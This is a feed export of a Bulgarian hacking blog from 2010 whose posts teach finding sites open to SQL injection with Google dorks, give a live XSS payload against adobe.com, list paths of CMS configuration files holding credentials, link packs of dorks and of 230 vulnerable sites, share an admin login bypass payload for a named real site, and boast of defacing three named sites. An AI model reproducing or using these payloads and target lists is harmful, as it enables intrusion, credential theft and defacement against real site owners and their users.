tag:blogger.com,1999:blog-46252291051412281152024-03-07T21:32:16.148-08:00Блогът на z3r0c0ld & KaratistBGOur crime is that of curiosityk@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.comBlogger11125tag:blogger.com,1999:blog-4625229105141228115.post-40616733093563746262010-11-22T03:47:00.000-08:002010-11-22T03:59:21.242-08:00Как се стартира perl exploit?Като за начало теглим ActivePerl от <a href="http://www.activestate.com/activeperl/downloads">тук</a> и я инсталираме.<br />
За пример ще приемем, че сме инсталирали програмата в C:/Program Files. <br />
Отваряме CMD (Command Prompt, Команден Прозорец) от Start -> Run -> cmd и пишем:<br />
<br />
<blockquote><code>cd..<br />
cd..<br />
C:\Perl\bin<br />
ime-na-ekspoita.pl</code></blockquote><br />
<span style="font-size: large;"><b style="color: #cc0000;">ВАЖНО!!!</b></span><br />
<span style="font-size: small;"><b>Файлът, който сте преименували от *.txt на *.pl се слага в C:/Program Files/Perl/bin </b></span><code> </code>k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-14078842595420328252010-11-20T12:14:00.000-08:002010-11-20T12:14:00.223-08:00Sql Injection Текстов урокПиша тази статия за SQL Injection защото все още не виждам добра и пълна статия за SQLi на български :)<br />
Аз не се занимавам с уеб хакинг затова за да напиша тази статия се рових доста из интернет.<br />
Някой ако иска може да допълни с някаква информация или да поправи неточности :)<br />
<br />
Какво е SQL? <br />
SQL е съкращение от английски Structured Query Language което на български съответно е Език за Структурирани Запитвания.<br />
SQL е един от най популярните езици за програмиране ако може да се нарече език за програмиране.<br />
Той се ползва за създаване, модифициране, извличане и манипулиране на данни от релационни системи за управление на бази данни.<br />
Такива системи са напраимер: Sybase, Oracle, Microsoft SQL Server, Access, MySQL, Ingres и други.<br />
Въпреки че повечето системи за бази данни използват SQL, повечето от тях имат свои собствени свойства които<br />
обикновени са само за определената система.<br />
Но стандартните SQL команди като 'Select', 'Insert', 'Update', 'Delete', 'Create', 'Drop' които важът за всички<br />
системи са ви достатачни за да извършите всичко което ви е нужно с базите от данни.<br />
<br />
Какво е SQL Injection?<br />
SQL Injection съкратено SQLi е метод за уеб хакинг чрез който хакера може да внедри и изпълни SQL команди<br />
върху базата данни на даденият сайт.<br />
<br />
Какво води до SQLi дупки?<br />
Обикновено нефилтрирани данни предавани към базата от данни води до SQLi уязвимости.<br />
В тази статия няма да наблегна на това а на намирането и експлойтването на SQLi, по нататък с малко помощ<br />
бих могъл да я разшеря.<br />
<br />
С какво може да се сдобием чрез SQLi атаки?<br />
Можете да вземете всичко от базата данни на сайта или да промените.Можете да вземете usernames,passwords,<br />
admin accounts а ако имате достъп до например някакъв онлайн магазин можете да се сдобиете и с кредитни карти.<br />
И тъй като доста от потребителите не разбират рисковете онлайн използват едни и същи пароли почти навсякаде<br />
от което след че сдобиете ли се с един акаунт в даден сайт ще се сдобиете с още няколко на даденият потребител<br />
сред които може да има и акаунти като PayPal,WebMoney,AlertPay и тем подобни.<br />
При някой по критични случей от една SQLi атака можете да постигнете root достъп на сървъра кадето се хоства<br />
сайта :)<br />
<br />
Как да намираме SQLi дупки?<br />
Има много методи със ботове, скенери но аз ще ви покажа един от най успешните и елементарни и това е чрез<br />
самият Google. Това става чрез използването на така наречентие доркове (dorks) това е просто вид гоогле запитване<br />
чрез което по определен начин търсим за имена на често уязвими променливи в адреса на сайта или за SQL грешки по самата<br />
страница.Разбирасе от намерините сайтове много малък процент ще са податливи на атака, надявам се да го разбирате :)<br />
<br />
Ето ви няколко примера за SQLi доркове (можете да ползвате и пакета с доркове): <br />
<br />
inurl:title.php?id=<br />
inurl:news_display.php?getid=<br />
inurl:sql.php?id=<br />
inurl:loadpsb.php?id=<br />
"id=" & intext:"Warning: mysql_query()<br />
"id=" & intext:"Warning: preg_match()<br />
<br />
Както казах дорка е просто запитване което кара google да търси за страници със SQL грешка или за променливи в адреса на сайта,<br />
които често са уязвими.<br />
<br />
Но възниква малък проблем, гоогле са сложили защита срещу прекомерното използване на такива доркове,<br />
така де например ако търсите уазвими сайтове с даден дорк то след 10/12 страница може да ви излезе:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.mydigitallife.info/wp-content/uploads/2007/11/google-error.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="http://www.mydigitallife.info/wp-content/uploads/2007/11/google-error.jpg" width="320" /></a></div><br />
<br />
Това е защита сложена от гоогле която спира ботове да сканират постояно за уязвими сайтове.<br />
Но за всеки проблем си има решения и в случая решението идва с една друга услуга предлагана от гоогле.<br />
А имено това да си направите ваша собствена гоогле търсачка от тук -> http://www.google.com/cse/<br />
Трябва ви gmail акаунти първо за да си направите търсачка, но сега няма да обяснявам това мисля че<br />
всеки ще се справи за да си направи.<br />
Направил съм една която можете да ползвате -> http://www.google.com/cse/home?cx=000908831945226824112:hl6ikt_iqv0<br />
Тези търсачки не блокират сайтове, нямат филтри и затова ще получавате много повече резултати.<br />
<br />
Добавил съм текстов доукмент със доста SQLi доркове към края на статията но ако искате да видите какви други<br />
интересни неща за които не сте и подозирали можете да намерите чрез гоогле ето ви линк -> http://johnny.ihackstuff.com/ghdb/<br />
Най-добрите гоогле доркове на куп, тук не само за SQLi а и за куп други неща :)<br />
<br />
Още нещо да добавя за дорковете ако например искате да намирате само сайтове с определен домейн можете да правите така:<br />
inurl:php?id= site:com //ще намирате сайтове които съдържат php?id= във адреса си и домейна завършва на .com<br />
inurl:php?id= site:karazero.blogspot.com //ще намирате само местата където се съдържа php?id= във адреса на сайта karazero.blogspot.com<br />
Как да проверим дали адреса има SQLi дупка?<br />
След като имате листа от доста адреси които сте намерили със доркове може да започнете да проверявате дали са податливи на атака.<br />
Това става като добавите ' към края на адреса.<br />
Пример: www.website.com/index.php?id=25'<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://prikachi.com/images/920/2684920m.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="http://prikachi.com/images/920/2684920m.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://prikachi.com/images/923/2684923X.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://prikachi.com/images/923/2684923X.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://prikachi.com/images/929/2684929o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="http://prikachi.com/images/929/2684929o.jpg" width="320" /></a></div><br />
Ако сайта е податлив обикновено той ще си зареди както обикновено или ще ви каже че страницата която търсите<br />
не е намерена.<br />
А ако е податлив трябва да ви покаже SQL грешка, което е нещо такова:<br />
<br />
<br />
Разбирасе не е задължително грешката да е на празна страница може грешката да се покаже на самата уеб страница ето така:<br />
<br />
<br />
<br />
<br />
ДА ЗАПОЧНЕМ ЕКСПЛОЙТВАНЕТО!<br />
След като имаме вече няколко сайта които знаем че са податливи на атака може да започнем със самата атака :)k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-77923777411901857782010-11-20T11:30:00.000-08:002010-11-20T11:33:31.454-08:00XSS уязвимост в adobe.com<div class="separator" style="clear: both; text-align: center;"><a href="http://images.ibox.bg/2009/03/29/shose/430x383.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="http://images.ibox.bg/2009/03/29/shose/430x383.jpg" width="320" /></a></div><br />
Докато се рових в <a href="http://adobe.com/">adobe.com</a> попаднах на:<br />
<br />
<blockquote><a href="https://www.adobe.com/login/login.jsp?currentSection=TRY&next=/products/tryadobe/download.jsp?ftpID=%22%20NAME=%22next%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E">https://www.adobe.com/login/login.jsp?currentSection=TRY&next=/products/tryadobe/download.jsp?ftpID=%22%20NAME=%22next%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</a></blockquote>И си казах на ум "УОУ"...k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-45393214720022399682010-11-20T11:08:00.000-08:002010-11-20T11:08:39.312-08:00Online WordList Generator<a href="http://www.wordlistgenerator.net/">http://www.wordlistgenerator.net</a> - Това е един онлайн генератор, чрез който можете да си направите един доста богат речник за вашият Brute Force.k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-59064602340939760562010-11-20T10:49:00.001-08:002010-11-20T10:49:25.262-08:00Конфигурационни файлове на по-известните CMSphpBB2 - /config.php<br />
phpBB3 - /config.php<br />
Simple Machines Forum - /Settings.php<br />
Invision Power Board - /conf_global.php<br />
Joomla - /configuration.php<br />
WordPress - /wp-config.php<br />
e107 - /e107_config.php<br />
vBulletin - /includes/config.php<br />
PHP-Fusion /config.php<br />
drupal /sites/default/settings.php<br />
Mybb /inc/config.php<br />
Php nuke /config.php<br />
oscomerce /includes/configure.php<br />
Seditio -> /datas/config.php<br />
Xoops - mainfile.php<br />
Zen Cart - includes/configure.php<br />
Tbdev (Tracker) - /include/secrets.php или config_announce.php<br />
Btit(Tracker) - /include/config.php<br />
MU Webs - /config.phpk@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-37898171670131637512010-11-19T12:42:00.000-08:002010-11-19T12:42:49.810-08:004367 Dork-аТози пакет съдържа 4367 дорка за намиране на Sql Injection в даден сайт.<br />
<br />
<a href="http://dox.bg/files/dw?a=4364206868">Изтегли</a><br />
Паролата е: <b>karazero</b>k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-27343963323556273102010-11-19T12:28:00.000-08:002010-11-19T13:12:54.633-08:00Sql Injection Видео урокКакво е <b>SQL инжекция</b>? <b>SQL инжекционна атака</b> възниква, когато нападателя експлоатира потребителкият вътрешен механизъм на уебсайт за промяна на резултата от <b>MySQL</b> заявката.<br />
<br />
<a href="http://dox.bg/files/dw?a=32351ce386">Свали</a> урока<br />
Паролата е: <b>karazero </b>k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-1612565306365632972010-11-19T12:08:00.000-08:002010-11-20T12:30:49.051-08:00SQLi PackТова е един архив от 230 уязвими на Sql Injection сайта.<br />
<br />
<a href="http://dox.bg/files/dw?a=cb651efea6">Изтегли</a><br />
Паролата е: <b>karazero </b>k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-22348320797217564332010-11-19T11:57:00.000-08:002010-11-19T11:57:58.301-08:00Prathamorissa.ORG [Admin Login Bypass Уязвимост]Здравейте, днес <u><b>ОТНОВО</b></u> попаднахме на уязвим сайт и решихме да споделим достъпа си с вас: <br />
<pre class="prettyprint"><span class="pln"> </span></pre><pre class="prettyprint"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.prathamorissa.org/admin.asp</span></pre><pre class="prettyprint"><span class="com">Име: </span><span class="pln"></span><span class="str">'or''='</span><span class="pln"></span></pre><pre class="prettyprint"><span class="pln">Парола: </span><span class="str">'or''='</span><span class="pln"></span></pre><pre class="prettyprint"><span class="pln">
</span></pre><pre class="prettyprint"><span class="pln">Е, вие сте! :)</span></pre><pre class="prettyprint"><span class="com"></span></pre>k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-62402978893826148422010-11-19T10:54:00.000-08:002010-11-19T11:00:59.687-08:00[19.11.2010]3x sites got ownedДнес (19.11.2010) успяхме да пробием 3 сайта :<br />
Сайт 1: http://aviocenter.com/deface.html<br />
Доказателство: http://zone-h.com/mirror/id/12333825<br />
<br />
Сайт 2: http://www.sassieventplanning.com/deface.html<br />
Доказателство: http://zone-h.com/mirror/id/12333827<br />
<br />
Сайт 3: http://badbg.org/<br />
Доказателство: http://zone-h.com/mirror/id/12242414k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0tag:blogger.com,1999:blog-4625229105141228115.post-59151200805656007732010-11-19T10:45:00.000-08:002010-11-19T10:45:10.370-08:00z3r0c0ld & KaratistBGЗдравейте!<br />
Добре дошли в нашия блог. Ние сме двама приятели, които си запълваме времето с ... писане. Попринцип се занимаваме с cracking. Тук ще се сдобиете с информация в тази сфера, новини и полезни средства. Приятно сърфиране из сайта.<br />
Поздрави!k@r@z3r0http://www.blogger.com/profile/09650220577006111411noreply@blogger.com0